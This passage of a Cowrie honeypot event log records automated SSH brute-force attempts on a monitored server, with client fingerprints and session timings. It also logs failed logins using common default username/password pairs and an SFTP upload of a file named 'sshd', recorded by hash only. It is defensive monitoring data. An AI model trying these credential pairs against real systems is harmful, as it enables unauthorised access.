{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57724,"dst_ip":"1.2.3.4","dst_port":22,"session":"061fc7d0eff2","protocol":"ssh","message":"New connection: 87.120.191.13:57724 (1.2.3.4:22) [session: 061fc7d0eff2]","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.630421Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":49470,"dst_ip":"1.2.3.4","dst_port":22,"session":"f42ec7de31e8","protocol":"ssh","message":"New connection: 87.120.191.13:49470 (1.2.3.4:22) [session: f42ec7de31e8]","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.634242Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57718,"dst_ip":"1.2.3.4","dst_port":22,"session":"e44c0d8add05","protocol":"ssh","message":"New connection: 87.120.191.13:57718 (1.2.3.4:22) [session: e44c0d8add05]","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.635618Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.636212Z","src_ip":"87.120.191.13","session":"e44c0d8add05"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.662628Z","src_ip":"87.120.191.13","session":"061fc7d0eff2"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.663354Z","src_ip":"87.120.191.13","session":"061fc7d0eff2"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.674168Z","src_ip":"87.120.191.13","session":"bb9f185b8ffb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.674787Z","src_ip":"87.120.191.13","session":"bb9f185b8ffb"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.683163Z","src_ip":"87.120.191.13","session":"f42ec7de31e8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.683882Z","src_ip":"87.120.191.13","session":"f42ec7de31e8"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.688635Z","src_ip":"87.120.191.13","session":"e44c0d8add05"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"1234567","message":"login attempt [ubnt/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.908868Z","src_ip":"87.120.191.13","session":"e44c0d8add05"}
{"eventid":"cowrie.login.failed","username":"noc","password":"123456","message":"login attempt [noc/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.919817Z","src_ip":"87.120.191.13","session":"061fc7d0eff2"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"1234567","message":"login attempt [ftpuser/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.928253Z","src_ip":"87.120.191.13","session":"bb9f185b8ffb"}
{"eventid":"cowrie.login.failed","username":"pi","password":"123456","message":"login attempt [pi/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:03.980773Z","src_ip":"87.120.191.13","session":"f42ec7de31e8"}
{"eventid":"cowrie.session.closed","duration":"15.1","message":"Connection lost after 15.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:04.762332Z","src_ip":"212.227.125.160","session":"bbe91cd249b9"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.013785Z","src_ip":"87.120.191.13","session":"e44c0d8add05"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.034500Z","src_ip":"87.120.191.13","session":"bb9f185b8ffb"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.051596Z","src_ip":"87.120.191.13","session":"061fc7d0eff2"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57740,"dst_ip":"1.2.3.4","dst_port":22,"session":"b2343703334a","protocol":"ssh","message":"New connection: 87.120.191.13:57740 (1.2.3.4:22) [session: b2343703334a]","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.052622Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57752,"dst_ip":"1.2.3.4","dst_port":22,"session":"4df0112d7157","protocol":"ssh","message":"New connection: 87.120.191.13:57752 (1.2.3.4:22) [session: 4df0112d7157]","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.075250Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57762,"dst_ip":"1.2.3.4","dst_port":22,"session":"412263d3154d","protocol":"ssh","message":"New connection: 87.120.191.13:57762 (1.2.3.4:22) [session: 412263d3154d]","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.083185Z"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.096617Z","src_ip":"87.120.191.13","session":"f42ec7de31e8"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57770,"dst_ip":"1.2.3.4","dst_port":22,"session":"60380f93dacb","protocol":"ssh","message":"New connection: 87.120.191.13:57770 (1.2.3.4:22) [session: 60380f93dacb]","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.132438Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.148847Z","src_ip":"87.120.191.13","session":"b2343703334a"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.149471Z","src_ip":"87.120.191.13","session":"b2343703334a"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.171222Z","src_ip":"87.120.191.13","session":"4df0112d7157"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.171934Z","src_ip":"87.120.191.13","session":"4df0112d7157"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.176564Z","src_ip":"87.120.191.13","session":"412263d3154d"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.177286Z","src_ip":"87.120.191.13","session":"412263d3154d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.247002Z","src_ip":"87.120.191.13","session":"60380f93dacb"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.248076Z","src_ip":"87.120.191.13","session":"60380f93dacb"}
{"eventid":"cowrie.login.failed","username":"noc","password":"1234567","message":"login attempt [noc/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.556237Z","src_ip":"87.120.191.13","session":"4df0112d7157"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/51b052a524af278366fb5527d4a5eee949b63f85168c37d4f97aefe3e73fe66a","shasum":"51b052a524af278366fb5527d4a5eee949b63f85168c37d4f97aefe3e73fe66a","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/51b052a524af278366fb5527d4a5eee949b63f85168c37d4f97aefe3e73fe66a","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.586848Z","src_ip":"212.227.235.229","session":"d66a1bafbae6"}
{"eventid":"cowrie.session.closed","duration":"319.2","message":"Connection lost after 319.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.587899Z","src_ip":"212.227.235.229","session":"d66a1bafbae6"}
{"eventid":"cowrie.login.failed","username":"ubnt","password":"P@ssw0rd","message":"login attempt [ubnt/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.667254Z","src_ip":"87.120.191.13","session":"b2343703334a"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"P@ssw0rd","message":"login attempt [ftpuser/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.668833Z","src_ip":"87.120.191.13","session":"412263d3154d"}
{"eventid":"cowrie.login.failed","username":"pi","password":"1234567","message":"login attempt [pi/1234567] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:05.748816Z","src_ip":"87.120.191.13","session":"60380f93dacb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.610931Z","src_ip":"87.120.191.13","session":"4df0112d7157"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.689846Z","src_ip":"87.120.191.13","session":"b2343703334a"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.690781Z","src_ip":"87.120.191.13","session":"412263d3154d"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57784,"dst_ip":"1.2.3.4","dst_port":22,"session":"151ec6f7057b","protocol":"ssh","message":"New connection: 87.120.191.13:57784 (1.2.3.4:22) [session: 151ec6f7057b]","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.709944Z"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57788,"dst_ip":"1.2.3.4","dst_port":22,"session":"51c1b9736228","protocol":"ssh","message":"New connection: 87.120.191.13:57788 (1.2.3.4:22) [session: 51c1b9736228]","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.711067Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.711833Z","src_ip":"87.120.191.13","session":"51c1b9736228"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.778440Z","src_ip":"87.120.191.13","session":"60380f93dacb"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57796,"dst_ip":"1.2.3.4","dst_port":22,"session":"e137f6b6f49e","protocol":"ssh","message":"New connection: 87.120.191.13:57796 (1.2.3.4:22) [session: e137f6b6f49e]","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.861519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.893884Z","src_ip":"87.120.191.13","session":"e137f6b6f49e"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T13:59:06.967110Z","src_ip":"87.120.191.13","session":"e137f6b6f49e"}
{"eventid":"cowrie.login.failed","username":"pi","password":"P@ssw0rd","message":"login attempt [pi/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T13:59:07.137996Z","src_ip":"87.120.191.13","session":"e137f6b6f49e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44154,"dst_ip":"1.2.3.4","dst_port":23,"session":"474724380db6","protocol":"telnet","message":"New connection: 212.227.125.160:44154 (1.2.3.4:23) [session: 474724380db6]","sensor":"my-vps","timestamp":"2025-08-26T13:59:07.481824Z"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:59:08.810379Z","src_ip":"87.120.191.13","session":"e137f6b6f49e"}
{"eventid":"cowrie.session.connect","src_ip":"87.120.191.13","src_port":57800,"dst_ip":"1.2.3.4","dst_port":22,"session":"309194da76ab","protocol":"ssh","message":"New connection: 87.120.191.13:57800 (1.2.3.4:22) [session: 309194da76ab]","sensor":"my-vps","timestamp":"2025-08-26T13:59:08.868579Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T13:59:09.043407Z","src_ip":"87.120.191.13","session":"309194da76ab"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.c